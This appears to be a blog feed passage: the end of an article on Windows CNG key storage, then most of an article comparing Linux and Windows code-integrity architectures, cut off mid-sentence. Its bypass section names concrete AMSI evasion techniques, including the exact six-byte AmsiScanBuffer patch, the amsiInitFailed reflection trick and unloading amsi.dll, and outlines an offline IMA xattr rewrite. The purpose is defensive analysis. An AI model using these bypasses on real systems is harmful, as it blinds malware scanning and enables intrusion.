flowchart TD Q1{"Need persistent -- private key?"} Q1 -- No --> B["BCrypt -- (ephemeral key, pseudo-handle)"] Q1 -- Yes --> Q2{"Threat model?"} Q2 -- "Machine identity, -- hardware-rooted" --> P["Microsoft Platform -- Crypto Provider -- (TPM / Pluton)"] Q2 -- "User-bound PKI, -- removable hardware" --> S["Microsoft Smart Card KSP -- (PIV / virtual smart card)"] Q2 -- "High signing rate, -- regulated custody" --> H["Third-party HSM KSP -- (YubiHSM / Luna / nShield)"] Q2 -- "Default, -- portable, fast" --> SW["Microsoft Software KSP"]

For algorithm choice in mid-2026, the defensible defaults look like this. Symmetric encryption: ChaCha20-Poly1305 or AES-256-GCM. Hashing: SHA-256 or SHA-3 family. Signatures: ECDSA P-256 or P-384 today, with ML-DSA-65 in the back pocket for the inevitable hybrid transition. Key encapsulation: X25519 today, with X25519+ML-KEM-768 hybrid as soon as your peers support it. RSA-2048 only for legacy interoperability. RC4, 3DES, and SHA-1 only behind explicit deprecation policy, and only for verification of historical artifacts.

Key idea: The hardest thing about CNG is not learning the API. It is choosing the right KSP. That single decision -- where the private key actually lives -- determines almost everything about your threat model, your throughput, your compliance posture, and your operational complexity.

A few engineering rules survive in any setting.

Do not put persistent keys in BCrypt. Every BCrypt key handle dies with the process. The architectural separation exists for a reason. If the key needs to survive a reboot, it belongs in NCrypt under a named KSP.

Do not assume the Software KSP. Code that calls NCryptOpenStorageProvider(NULL) ends up with whatever the default is. On a server with an HSM KSP configured as the default, this might be what you want; on a developer workstation, it might be the Microsoft Software KSP. Be explicit. Pass the name string. Test the negative case where the KSP you named is not registered.

Audit which KSP your certificates actually use. A certificate enrolled with the Platform Crypto Provider behaves identically to a certificate enrolled with the Software KSP from certutil's point of view. The difference is invisible until you ask. Use certutil -store -v My to dump certificate properties, and look for the provider field.

Treat FIPS mode as a deployment fact, not a development toggle. Code that works fine on a developer workstation can break in surprising ways on a FIPS-enabled production server. Run your CI on a FIPS-toggled image periodically. Catch the STATUS_NOT_SUPPORTED returns before customers do.

Watch the PQC roadmap. The ML-KEM and ML-DSA primitives are in 24H2. Hybrid TLS in Schannel is not on by default at the OS level as of mid-2026 (the most recent Microsoft public posture in the cipher-suite documentation does not yet list a default-on hybrid group), but downstream protocol updates will come. Code that uses the BCrypt and NCrypt patterns shown here picks up the new algorithms with a string change.

Note: The single most useful CNG diagnostic command on a modern Windows system is certutil -csptest, which enumerates registered providers and the algorithms each one claims to support. Run it before you suspect a configuration drift, not after.

The story of CNG is the story of two architectural bets that paid off. The first bet was that algorithms would keep arriving, so the API should be a registry of strings rather than a hard-coded set of functions. The second bet was that key storage was a separate concern from algorithm implementation, so the same primitives could run against software, TPM, smart cards, and HSMs without changing the application. In 2007 those bets looked over-engineered. In 2026, with ML-KEM shipping behind the same BCryptEncapsulate call that an ECDH consumer would have used, they look like exactly the right design.

Frequently asked questions

No. Microsoft's BCrypt is the `bcrypt.h` primitives header in CNG, providing AES, SHA, HMAC, RNG, and related primitives. The Provos-Mazieres bcrypt is a password-hashing function based on the Blowfish cipher, with no connection to Windows. The naming collision is unfortunate but firmly entrenched. When in doubt, BCrypt with a capital "B" usually means Microsoft's CNG header; lowercase bcrypt usually means the password-hashing function. On Windows, yes. .NET's `System.Security.Cryptography` namespace wraps CNG directly: `RSACng`, `ECDsaCng`, `AesGcm`, `SHA256.HashData()`, `CngKey`. Go, Rust, and Python bindings exist as third-party crates and packages (the Rust `windows` crate exposes both BCrypt and NCrypt, for example). OpenSSL on Windows does not transparently use CNG; you need the `openssl-cng` provider or direct CNG calls if you want the OS-validated primitives to do the work. Both can do RSA, ECDSA, and (in 24H2) ML-DSA signatures. The difference is lifetime. BCrypt key handles are ephemeral: they live in your process and disappear when it exits. NCrypt keys are persisted in a KSP and survive process exit, reboots, and (for AD-replicated descriptors via DPAPI-NG) the loss of a single machine. Use BCrypt for one-shot ephemeral operations (signing a single message, deriving a session key); use NCrypt for anything with a certificate attached or anything that has to be around tomorrow. Possibly, depending on what algorithms it calls. Setting `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled = 1` causes CNG to refuse RC4, MD5, SHA-1 for new signatures, and a handful of other non-approved algorithms. Anything that relied on those returns `STATUS_NOT_SUPPORTED`. The fix is to switch to approved algorithms (AES, SHA-2 family, RSA, ECDSA, ML-KEM, ML-DSA), not to disable the toggle. The toggle is also necessary but not sufficient for FIPS compliance: you also need a Windows build with an active CMVP certificate covering the cryptographic modules. As of mid-2026, the public Schannel documentation does not list a default-on hybrid group like `X25519MLKEM768`. The ML-KEM primitive is in CNG in 24H2, and Schannel can use it through the standard cipher-suite negotiation, but Microsoft has not publicly committed to enabling a hybrid group out of the box at the OS level. Chrome, Cloudflare, and AWS have already shipped hybrid PQ TLS in production at the application layer. Expect Schannel to follow once IETF standardization stabilizes and CMVP validation of the new modules catches up. For a certificate in the user or machine store, run `certutil -store -v My` (or `My` replaced with the store name) and look at the "Provider" field of each certificate. `Microsoft Software Key Storage Provider` means the key is on disk under `%APPDATA%` or `%ALLUSERSPROFILE%`. `Microsoft Platform Crypto Provider` means the key lives inside the TPM (or Pluton). `Microsoft Smart Card Key Storage Provider` means the key is on a card. Third-party HSM KSPs will show the vendor's provider name. For a freshly-created key via `NCryptCreatePersistedKey`, the provider name you passed to `NCryptOpenStorageProvider` is the source of truth. Because private keys do not live in the calling process. For the Microsoft Software KSP, key material lives in the LSA key-isolation process (`lsaiso.exe` under VBS, `lsass.exe` otherwise), and every operation that touches private bits has to cross that process boundary. The cost is around 30 to 100 microseconds per call. That is acceptable for signing or key derivation (operations that happen a handful of times per session); it would be punishing for bulk symmetric encryption. The architectural answer is to keep bulk crypto in BCrypt and let only the persistent-key operations pay the LRPC cost.

<StudyGuide slug="cng-architecture-bcrypt-ncrypt-ksps-and-windows-crypto" keyTerms={[ { term: "CAPI (Cryptographic Application Programming Interface)", definition: "The original Windows cryptographic API (1998-onward). Plug-in unit was the CSP. Superseded by CNG starting in 2007 but still present for backwards compatibility." }, { term: "CNG (Cryptography API: Next Generation)", definition: "The Windows cryptographic API since Vista (2007). Two-tier split: BCrypt for primitives, NCrypt for key storage. The basis for all modern Windows cryptography." }, { term: "CSP (Cryptographic Service Provider)", definition: "The CAPI-era plug-in unit. Monolithic DLL bundling algorithms, key storage, and FIPS posture." }, { term: "KSP (Key Storage Provider)", definition: "The CNG-era plug-in unit for persistent key storage. Microsoft ships four; third parties ship many more. Selected by name string passed to NCryptOpenStorageProvider." }, { term: "Microsoft Software Key Storage Provider", definition: "The default KSP. Stores DPAPI-wrapped keys on disk and dispatches operations through the LSA key-isolation process via LRPC." }, { term: "Microsoft Platform Crypto Provider", definition: "The TPM-and-Pluton-backed KSP. Keys are generated and used inside the TPM chip; private bits never leave the silicon." }, { term: "TPM key attestation", definition: "A three-key chain (EK -> AIK -> application key) that lets a CA verify a key was generated inside a real TPM. Supported by Active Directory Certificate Services since Windows Server 2012 R2." }, { term: "FIPS 140", definition: "US federal certification program for cryptographic modules. Validated modules receive a public CMVP certificate. Windows 11's bcryptprimitives.dll holds CMVP certificate #4825, cng.sys holds #4766." }, { term: "ML-KEM (FIPS 203)", definition: "Module-Lattice Key Encapsulation Mechanism. The NIST-standardized post-quantum KEM, formerly known as CRYSTALS-Kyber. Shipped in Windows 11 24H2." }, { term: "ML-DSA (FIPS 204)", definition: "Module-Lattice Digital Signature Algorithm. The NIST-standardized post-quantum signature scheme, formerly known as CRYSTALS-Dilithium. Shipped in Windows 11 24H2." }, { term: "DPAPI-NG", definition: "The CNG-era rebuild of the original Data Protection API. Uses NCrypt protection descriptors to bind protected data to AD principals (users, groups, web credentials) rather than to a single machine." }, { term: "SymCrypt", definition: "Microsoft's open-source cryptographic implementation library. The actual workhorse behind BCrypt and NCrypt since Windows 10 version 1703 (2017)." } ]} />

Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

Linux and Windows have spent fifteen years answering the same question -- "is this code allowed to run?" -- and arrived at radically different architectures. Linux composes half a dozen narrow kernel modules (IMA, EVM, AppArmor, SELinux, fs-verity, IPE) plus a userspace daemon (`fapolicyd`); Windows ships one integrated suite (App Control + HVCI + AMSI + Smart App Control). Both stacks shipped their v1 with the **check in the wrong place**, and the architectural pivots that fixed it -- EVM's HMAC-sealed xattrs, HVCI's hypervisor-isolated verifier, IPE's property-based decisions -- are the breakthrough lesson of this comparison. Crypto is solved. Trust-boundary protection and policy expressiveness are not, and Rice's theorem says they never fully will be.

1. Two bypasses, same architectural shape

On a Windows 11 desktop, an attacker with a PowerShell session under their control can blind Microsoft Defender to every script that session ever evaluates by overwriting six bytes inside one function in amsi.dll. The Antimalware Scan Interface, the in-process bridge between scripting hosts and the registered antivirus product, dutifully reports "clean" on every subsequent buffer because the prologue of AmsiScanBuffer has been patched to mov eax, 0; ret (B8 00 00 00 00 C3).

The interface ships exactly as Microsoft documents it, and the function still has the signature in MSDN [@learn-microsoft-com-amsi-amsiscanbuffer]: the attacker did not need to break anything. They needed only to write into the address space they already owned.

On a Linux server, a different attacker with offline access to the disk -- recovered from a stolen laptop, a forensics image, a hostile cloud-provider snapshot -- mounts the filesystem and rewrites a system binary together with the file's security.ima extended attribute. When the box boots, the kernel's Integrity Measurement Architecture hashes the binary at exec time, compares the hash to the value stored in security.ima, sees a match, and allows execution. Without the Extended Verification Module, IMA appraisal has no defence against this offline-rewrite attack [@lwn-net-articles-394170] -- the reference hash is sitting next to the file the attacker just replaced.

Both operating systems claim fail-closed code-integrity enforcement. Both lose to a single architectural mistake about where the check runs. The mistakes are different in detail and identical in shape: the verifier is reachable by the attacker. On Windows the attacker shares the script host's address space with the scanner. On Linux the attacker shares the on-disk container with the reference hash.

This article exists to make that symmetry visible. The two stacks reached their 2026 form by very different routes -- Linux composes six narrow Linux Security Modules and one userspace daemon, Windows ships one tightly-coupled product line -- but the breakthroughs on each side answered the same question: how do you move the verifier out of reach?

The Linux answer was EVM (HMAC the extended attributes that IMA depends on) and IPE (decide on immutable file properties rather than file contents). The Windows answer was HVCI (lift the kernel-mode code-integrity check into a hypervisor-isolated secure kernel). The names are different. The lesson is one.

Why did Linux and Windows arrive at such different architectures in the first place? That story starts in an IBM research lab in 2003.

2. The question both operating systems are trying to answer

Both lineages exist to answer one question -- "is this code allowed to run?" -- but they put the check in completely different places. Before we can compare them honestly, we need a shared vocabulary for the three layers any production code-integrity stack must cover.

The first layer is code integrity itself, often abbreviated CI: a gate on the file's content or its signer. Did this .so come from a package my distribution signed? Does this .exe match an Authenticode chain rooted in a publisher my policy trusts? The answer is binary. The hook fires before the process loads the bytes.

The second layer is mandatory access control, or MAC. Now the process is running. What can it do? Can nginx open /etc/shadow? Can mshta.exe spawn cmd.exe? MAC is enforced by the kernel above discretionary access control and cannot be overridden by userspace privileges.

A kernel-enforced policy layer above traditional discretionary access control (DAC). Unlike DAC, where the file owner sets permissions, MAC policy is set by the system administrator and applied uniformly to all processes; no user, including root, can override it without changing the policy itself.

The third layer is content inspection: gating not on the file but on the buffer the interpreter is about to evaluate. The PowerShell engine has just deobfuscated a long string into a script block. Is the script block malicious? Linux has no production equivalent. Windows ships AMSI [@learn-microsoft-com-interface-portal] for exactly this.

Where each operating system puts these checks tells you almost everything about its architectural philosophy.

Linux puts every check on a Linux Security Module hook [@kernel-org-security-lsmhtml]. IMA registers at bprm_check (the kernel hook that fires when a binary is about to be executed), file_mmap with MAY_EXEC, module_check, firmware_check, and kexec_*. AppArmor and SELinux register at the syscall-level access hooks. fapolicyd rides on top of fanotify. IPE hooks op=EXECUTE. The kernel is the trust boundary, and every mechanism is a polite tenant inside it.

The kernel framework, merged into Linux 2.6.0 in December 2003, that hosts pluggable security modules at well-defined hook points in the kernel. LSMs include SELinux, AppArmor, Smack, Tomoyo, IMA, EVM, IPE, BPF LSM, and Landlock; multiple modules can coexist via "LSM stacking".

Windows takes the opposite path. The PE loader is the gate for user-mode code integrity (UMCI). The kernel-mode code-integrity check is, in the modern stack, moved out of the normal kernel into a small secure kernel running on top of Hyper-V -- Hypervisor-protected Code Integrity, HVCI [@learn-microsoft-com-code-integrity]. The script broker runs in-process with each scripting host. Cloud reputation is consulted via the Intelligent Security Graph and exposed to consumers as Smart App Control.

A monotonically extendable hash register inside a Trusted Platform Module. New measurements are folded in with `PCR_new = SHA256(PCR_old || measurement)`. Once extended, the value cannot be rolled back without resetting the TPM. IMA extends file-content hashes into PCR 10; the Windows Measured Boot chain uses PCRs 0-7 and 11-14.

The architectural philosophy comes down to a sentence each. Linux trusts the kernel surface and packs every integrity mechanism into it as a separate LSM. Windows trusts a hypervisor-isolated secure kernel and uses it to host the integrity logic the normal kernel cannot be trusted to run honestly.

flowchart LR subgraph CI[Code integrity: gate on file content or signer] direction TB L_IMA[Linux: IMA + EVM] L_IPE[Linux: IPE] L_FSV[Linux: fs-verity] L_FAP[Linux: fapolicyd] W_WDAC[Windows: App Control / WDAC] W_HVCI[Windows: HVCI / Memory Integrity] W_SAC[Windows: Smart App Control] end subgraph MAC[Mandatory access control: gate on running process behaviour] direction TB L_AA[Linux: AppArmor] L_SE[Linux: SELinux] W_NONE[Windows: no direct analogue, closest is AppContainer / ASR] end subgraph CS[Content inspection: gate on the buffer the interpreter will evaluate] direction TB W_AMSI[Windows: AMSI] L_GAP[Linux: no production equivalent] end CI --> MAC --> CS

Neither stack started this way. The 2026 stack on each side is the accumulated answer to fifteen years of failures. Here is how they grew up.

3. Two genesis stories

In 2003, four IBM researchers at the T. J. Watson Research Center -- Reiner Sailer, Xiaolan Zhang, Trent Jaeger, and Leendert van Doorn -- tried to convince the USENIX Security community that you could prove the integrity of a Linux web server to a remote verifier. Their paper, Design and Implementation of a TCG-based Integrity Measurement Architecture [@usenix-org-tech-sailerhtml], shipped at the 13th USENIX Security Symposium in 2004. It proposed hashing every executable file at load time, extending each hash into a TPM platform configuration register, and sending the resulting measurement list to a remote verifier who could compare it to a known-good manifest.

The performance evaluation [@usenix-org-sailerhtml-node19html] measured the cost on an IBM Netvista with a 2.4 GHz Pentium 4: the file_mmap LSM hook added 0.08 microseconds per call on a cache hit, and SHA-1 fingerprinting ran at roughly 80 MB/s. The headline claim was that more than 99.9% of measure calls landed on the cached path, so the overhead was essentially free.Pentium 4-era SHA-1 at 80 MB/s vs Ice Lake-era SHA-NI-accelerated SHA-256 at roughly 2 GB/s per core: a 25x throughput jump in twenty years. The original paper's qualitative finding -- cache hit dominates, overhead is negligible -- holds even more strongly on modern silicon.

It took five years for that proposal to reach the kernel. IMA's measurement-only mode was merged in Linux 2.6.30 in June 2009. It hashed files at bprm_check, file_mmap, and module_check, extended TPM PCR 10, and otherwise let everything run.

The "is this hash allowed?" question would have to wait three more years. The Extended Verification Module landed in Linux 3.2 in January 2012; digital-signature mode for EVM followed in 3.3 in March 2012; and IMA-appraise, the enforcement extension that finally let the kernel return -EPERM when a file's hash did not match security.ima, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. The same LWN article frames the cadence plainly: "Much of IMA was added to the kernel in 2.6.30, but another piece, the extended verification module (EVM) was not merged until 3.2 ... Digital signature support was added to EVM in 3.3, and IMA appraisal is currently under review." Mimi Zohar's appraisal patchset [@lwn-net-articles-487700] is the canonical lore.kernel.org artifact of that final step.

AppArmor took a different, longer road. It was born inside Immunix in 1998 under the name "SubDomain", a path-based confinement layer designed to stop privilege-escalation exploits from doing anything the binary's profile did not name. Novell acquired Immunix in 2005, renamed SubDomain to AppArmor, and shipped it as the default mandatory access control layer on SLES and openSUSE. According to the Ubuntu AppArmor wiki [@wiki-ubuntu-com-apparmor], "AppArmor support was first introduced in Ubuntu 7.04, and is turned on by default in Ubuntu 7.10 and later" -- so by October 2007 AppArmor was already a default-on production MAC on the most-deployed Linux desktop distribution.

Mainlining did not happen until October 2010, when AppArmor finally landed in Linux 2.6.36 [@docs-kernel-org-lsm-apparmorhtml]. Seven years out of tree, three years default-on in Ubuntu, before the kernel community accepted it.

The contrast with SELinux [@en-wikipedia-org-security-enhancedlinux] is sharp. SELinux merged into Linux 2.6.0 in December 2003 -- barely a year after the LSM framework was created. SELinux was, in fact, the reason the LSM framework existed.

SELinux's type-enforcement model maps directly to LSM's "label the subject, label the object, look up the rule" hook signature. AppArmor's path-based reasoning does not. LSM hooks see inodes, not paths -- and an inode can be reached from many paths (bind mounts, hard links, namespace games, chroots). To merge, AppArmor had to push kernel-side helpers like `vfs_path_lookup` and `d_absolute_path` upstream so it could reconstruct the absolute path of the object at hook time. The conceptual fight took three rejected merge attempts and seven years. The lesson is one Linux kernel reviewers have repeated since: a security model is not just an algorithm, it is a commitment to a particular kind of name-resolution semantics.

The Windows lineage starts in a different building entirely. AppLocker shipped with Windows 7 and Windows Server 2008 R2 in 2009: a user-mode-only allowlist, with no hypervisor or kernel-mode backing, and rules tied to file paths, publishers, or hashes. AppLocker is still supported on modern Windows but "isn't getting new feature improvements" [@learn-microsoft-com-applocker-overview]; the modern successor is App Control for Business.

Windows 10 RTM (version 1507, July 2015) shipped the first version of Device Guard along with AMSI [@learn-microsoft-com-interface-portal] and PowerShell 5.0, which integrated with AMSI from day one. Device Guard became known as Windows Defender Application Control (WDAC) and then, in 2024, was renamed once more to App Control for Business. User-mode code integrity (UMCI) became a policy option, FilePath rules were added in Windows 10 version 1903 [@learn-microsoft-com-applocker-overview], multiple-policy authoring landed in the same release, and Smart App Control made its consumer debut in Windows 11 22H2 in September 2022 [@blogs-windows-com-2022-update].

gantt title Linux and Windows code-integrity timeline dateFormat YYYY-MM axisFormat %Y section Linux SELinux mainline 2.6.0 :2003-12, 12M AppArmor at Immunix :1998-01, 84M AppArmor default in Ubuntu :2007-10, 36M IMA mainline 2.6.30 :2009-06, 32M EVM mainline 3.2 :2012-01, 2M EVM digital sigs 3.3 :2012-03, 9M IMA-appraise 3.7 :2012-12, 24M AppArmor mainline 2.6.36 :2010-10, 14M fs-verity 5.4 :2019-11, 60M IPE 6.12 :2024-11, 12M section Windows AppLocker (Win 7) :2009-10, 70M Device Guard + AMSI + PowerShell 5 (1507) :2015-07, 25M WDAC UMCI (1709) :2017-10, 18M FilePath rules + multi-policy (1903) :2019-05, 24M HVCI broadens (Win 10 1607+) :2016-08, 60M Smart App Control (Win 11 22H2) :2022-09, 24M App Control for Business rename :2024-01, 12M

Two timelines, two design philosophies, both shipping their v1 with the same kind of mistake. The next section makes that concrete.

4. Where the naive approach breaks

Both stacks shipped their first version with the check in the wrong place. Two stories make this concrete; two more refine it.

Story A: IMA-as-shipped (2009) without EVM

When IMA reached the kernel in Linux 2.6.30, it hashed the file at bprm_check and stored the reference hash in the file's security.ima extended attribute. That is what an attacker with offline disk access needs to defeat the check, and exactly nothing else. Mount the filesystem from another box, swap the binary for a malicious one, recompute the SHA over the new binary, write the new value into security.ima. Boot the box. The kernel hashes the malicious binary at exec, reads the matching xattr the attacker just wrote, and lets the syscall through.

This is the offline-tampering attacker model EVM was designed to defeat. The contemporaneous LWN coverage put it plainly: "IMA can be subverted by 'offline' attacks, where file data or metadata is changed out from under IMA. Mimi Zohar has proposed the extended verification module (EVM) patch set as a means to protect against these offline attacks." [@lwn-net-articles-394170]

The EVM v5 patchset [@lwn-net-articles-443038], posted by Zohar in May 2011, describes the design directly: "Extended Verification Module (EVM) detects offline tampering of the security extended attributes (e.g. security.selinux, security.SMACK64, security.ima) ... initial method maintains an HMAC-sha1 across a set of security extended attributes, storing the HMAC as the extended attribute 'security.evm'."

Story B: AMSI as shipped (2015) inside the script host

AMSI's design is documented in How AMSI helps you defend against malware [@learn-microsoft-com-amsi-helps]: "Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code. And that's the point at which you invoke the AMSI APIs."

A scripting host -- PowerShell, WSH, MSHTA, Office VBA, the UAC installer dialog -- calls AmsiInitialize, then for every plain-text script buffer it is about to execute calls AmsiScanBuffer [@learn-microsoft-com-amsi-amsiscanbuffer] or AmsiScanString. The call is routed through amsi.dll, loaded into the host process, which dispatches to the registered IAntimalwareProvider COM server. Defender is the default provider.

The detection logic is sound. The trust boundary is not. The attacker already controls the script host. Three single-shot bypass techniques have lived in red-team toolkits since 2016:

Patch AmsiScanBuffer's prologue in memory to mov eax, 0; ret (B8 00 00 00 00 C3). Six bytes of opcode rewrite, no syscalls required, blinds the scanner permanently for this process.
Set System.Management.Automation.AmsiUtils.amsiInitFailed = true via reflection. PowerShell checks the flag on every scan path and short-circuits.
Unload amsi.dll via FreeLibrary. There is no scanner left to call.

Microsoft tracks this so closely that its own "Applications that can bypass App Control" [@learn-microsoft-com-bypass-appcontrol] deny list calls out the AMSI-bypass-capable versions of system.management.automation.dll by hash. The defender's authoritative list of files-to-block treats specific signed Microsoft DLLs as named threats.The same Microsoft bypass list also enumerates mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, wmic.exe, bash.exe, wsl.exe, runscripthelper.exe, and dozens of others -- 40+ entries today, growing whenever a new Microsoft-signed binary turns out to host an attacker-friendly evaluator.

Note: The host process making the AMSI call is the same process the attacker is running in. Any defence-in-depth plan that treats AMSI as a hard control is mis-specified. Treat AMSI as a high-quality telemetry surface feeding Defender for Endpoint and EDR pipelines; budget for the bypass.

{` // In Windows, AMSI scans each plain-text script buffer just before // the scripting engine evaluates it. The scanner lives in amsi.dll, // loaded into the script host process. The attacker who controls // that process can rewrite the function's first few bytes. // // This toy model shows the consequence: once "patched", the scanner // returns CLEAN regardless of input, and the assertion below holds // for every possible payload.

const AMSI_RESULT_CLEAN = 0; const AMSI_RESULT_MALWARE = 32768;

function amsiScanBuffer(buf, patched) { if (patched) return AMSI_RESULT_CLEAN; if (buf.includes("Invoke-Mimikatz")) return AMSI_RESULT_MALWARE; return AMSI_RESULT_CLEAN; }

console.log("Normal mode:"); console.log(" clean payload: ", amsiScanBuffer("Get-Process", false)); console.log(" malicious payload:", amsiScanBuffer("Invoke-Mimikatz", false));

console.log("\nAfter six-byte patch:"); console.log(" clean payload: ", amsiScanBuffer("Get-Process", true)); console.log(" malicious payload:", amsiScanBuffer("Invoke-Mimikatz", true));

// The takeaway: no input ever produces MALWARE once the scanner is patched. // Strengthening AMSI's signature engine cannot fix this. The scanner // must move out of the script host's address space. `}

Story C: WDAC's "trust all Microsoft-signed code" anti-pattern

A WDAC policy that trusts code signed by Microsoft also trusts every binary Microsoft has ever signed. That set includes mshta.exe, wscript.exe, cscript.exe, msbuild.exe, wmic.exe, system.management.automation.dll, and the 40-plus other binaries enumerated on Microsoft's own App Control bypass list [@learn-microsoft-com-bypass-appcontrol]. The LOLBAS community catalogue [@lolbas-project-github-io] widens the field to roughly 200 living-off-the-land binaries with explicit MITRE ATT&CK technique mappings.

The pattern is structural: WDAC grants trust at signer granularity (a chain rooted at "Microsoft Corporation"); attackers exploit at binary granularity (the specific mshta.exe that will happily evaluate an HTA blob containing a PowerShell stager). Any non-trivial WDAC policy must therefore contain explicit hash-level denies for the known-bad versions, and must keep growing those denies as Microsoft ships new signed binaries.

Story D: fapolicyd's permissive-window failure

fapolicyd [@access-redhat-com-fapolicydsecurity-hardening] is the Red Hat userspace allowlister. It sits on the fanotify permission channel and answers "may this open or exec proceed?" against a compiled rule database. It does not have IMA's offline-tampering problem because trust is inherited from the RPM database: "An application is trusted when the system package manager correctly installs it and therefore registered in the system RPM database. The fapolicyd daemon uses the RPM database as a list of trusted binaries and scripts."

What it does have is an operational footgun. Setting permissive=1 "just for troubleshooting" silently disables enforcement. Terminating the daemon causes the kernel to fail open after the fanotify response timeout. The architectural choice -- userspace daemon over kernel-mode hook -- is what makes both failure modes possible.

Key idea: The check was strong. The boundary protecting the check was weak. On IMA-as-shipped the reference hash sat next to the file the attacker rewrote. On AMSI the scanner sat inside the process the attacker controlled. On WDAC the trust grant was wider than the exploitation unit. On fapolicyd the verifier was a userspace process that could be terminated. Four different stacks, four different boundary failures, one identical lesson.

Bypass class	Stack	Concrete example	Root cause
Offline metadata swap	IMA without EVM	Rewrite binary and matching `security.ima` xattr from rescue media	Reference value stored next to the file under attacker control
In-process scanner patch	AMSI in PowerShell	`mov eax, AMSI_RESULT_CLEAN; ret` over `AmsiScanBuffer` prologue	Scanner shares address space with the script host the attacker runs in
Signer-vs-binary mismatch	WDAC Publisher rules	Allow Microsoft-signed code, attacker runs `mshta.exe`	Trust grant is coarser than the exploitable unit
Daemon liveness	fapolicyd	Terminate `fapolicyd` or set `permissive=1`	Verifier is a userspace process with no kernel-rooted backstop

Each of these failures has the same shape: the check was strong, the boundary protecting the check was weak. Both operating systems noticed, and fixed it in 2012 and 2016 in very different ways. Both fixes followed the same principle.

5. The architectural pivots

Both lineages reached the same conclusion at the same time: strengthen the boundary, not the check. Each pivot moved the trust boundary outward, beyond the place the attacker could reach.

EVM (Linux 3.2, January 2012): the xattrs become non-forgeable

The Extended Verification Module computes an HMAC over the security-relevant extended attributes -- security.ima, security.selinux, security.SMACK64, security.apparmor, security.capability -- plus inode metadata (UID, GID, mode, generation), and stores the result in security.evm. The HMAC key is loaded into the kernel keyring at boot, ideally sealed to a TPM 2.0 PCR set so the key is not retrievable except on a machine whose boot state matches the sealing measurement. The kernel keyring documentation for trusted and encrypted keys [@kernel-org-trusted-encryptedhtml] describes the substrate.

An offline attacker with disk access still cannot forge security.evm without the HMAC key. Digital-signature mode (EVM portable signatures, Linux 3.3) gives the same guarantee without any on-box key material. The check did not get cryptographically stronger: HMAC-SHA256 was not new in 2012. What changed was that the reference value the check consults moved from "an xattr next to the file" to "an xattr whose integrity is bound to a key the attacker does not have". Red Hat documents the modern setup in Enhancing security with the kernel integrity subsystem [@access-redhat-com-subsystemsecurity-hardening].

The Linux integrity module that protects the security-relevant extended attributes IMA depends on. EVM computes an HMAC (or digital signature) over the xattr set plus inode metadata and stores it in `security.evm`. Without the EVM key, an offline attacker cannot rewrite a binary and its matching `security.ima` to produce a valid pair. sequenceDiagram participant App as User app participant K as Kernel participant FS as Filesystem participant IMA as IMA participant EVM as EVM participant TPM as TPM keyring App->>K: execve("/usr/bin/foo") K->>IMA: bprm_check hook IMA->>FS: read file bytes IMA->>IMA: compute SHA-256 IMA->>FS: read security.ima xattr IMA->>EVM: verify xattr integrity EVM->>FS: read security.evm and full xattr set EVM->>TPM: HMAC key from keyring (sealed to PCRs) EVM->>EVM: recompute HMAC over xattr set + inode meta alt HMAC matches and IMA hash matches EVM-->>IMA: ok IMA-->>K: allow K-->>App: exec proceeds else mismatch EVM-->>IMA: -EPERM IMA-->>K: deny K-->>App: -EPERM end

IMA-appraise (Linux 3.7, December 2012): from observation to enforcement

The merge cadence on the kernel side is itself part of the story. Measurement-only IMA shipped in 2.6.30 in 2009. EVM merged in 3.2 in January 2012. EVM digital signatures merged in 3.3 in March 2012. IMA-appraise, which finally lets the kernel return -EPERM on a hash mismatch, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. Three and a half years from "we hash files" to "we refuse to run files that fail the hash". The gap was not engineering laziness; it was the time it took to design and merge the boundary-strengthening pieces that made enforcement safe to enable.

HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel

Windows took the equivalent step four years later, but at a different layer. Virtualization-Based Security (VBS) [@learn-microsoft-com-oem-vbs] splits Windows into Virtual Trust Level 0 -- the normal kernel everyone has been writing rootkits for since 1993 -- and Virtual Trust Level 1, a small secure kernel hosted by Hyper-V. The kernel-mode Code Integrity check that gates loading of every driver is moved into VTL1. A VTL0 attacker with full SYSTEM, even one who has loaded a malicious driver, cannot patch the VTL1 verifier; they cannot even read its memory.

Windows' Hyper-V-rooted split that puts a small secure kernel in VTL1, isolated from the normal Windows kernel (VTL0) by the hypervisor. Hypervisor-protected Code Integrity (HVCI), exposed in Windows Settings as "Memory integrity", uses VTL1 to host the kernel-mode code-integrity check, so a VTL0 attacker with SYSTEM cannot patch the verifier or downgrade its policy.

Microsoft's HVCI documentation [@learn-microsoft-com-oem-vbs] frames the W^X invariant HVCI enforces on kernel pages: "memory integrity ... protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS ... ensuring that kernel memory pages are only made executable after passing code integrity checks inside the secure runtime environment, and executable pages themselves are never writable." A kernel page can be writable or executable; never both at the same time. The split is enforced by the hypervisor."HVCI", "Memory Integrity", and "kernel-mode code integrity running in VBS" are the same mechanism. Microsoft's product-name churn here is unusually thick: the Windows Settings UI calls it Memory Integrity, the documentation page is titled "Enable virtualization-based protection of code integrity", the underlying capability is HVCI, and Microsoft also markets the same hardware-and-software bundle as "Secured-Core PC".

flowchart TD subgraph VTL0[VTL0: normal Windows kernel] P[User process] DRV[Driver load request] RK[Hypothetical rootkit with SYSTEM] K0[NT kernel] P --> K0 DRV --> K0 RK --> K0 end K0 -->|hypercall: verify driver| HV[Hypervisor] RK -.X.-> SK HV --> SK subgraph VTL1[VTL1: secure kernel] SK[Secure kernel] CI[Kernel-mode CI verifier] SK --> CI end CI -->|allow / deny| HV HV -->|result| K0

IPE (Linux 6.12, November 2024): property-based decisions

The most recent Linux pivot moves further still. Integrity Policy Enforcement [@docs-kernel-org-lsm-ipehtml], upstreamed in Linux 6.12 in November 2024 from a Microsoft-contributed patch series (source on GitHub [@github-com-microsoft-ipe]), does not hash files at all. Its kernel documentation is explicit: "Integrity Policy Enforcement (IPE) is a Linux Security Module that takes a complementary approach to access control. Unlike traditional access control mechanisms that rely on labels and paths for decision-making, IPE focuses on the immutable security properties inherent to system components." A policy rule looks like:

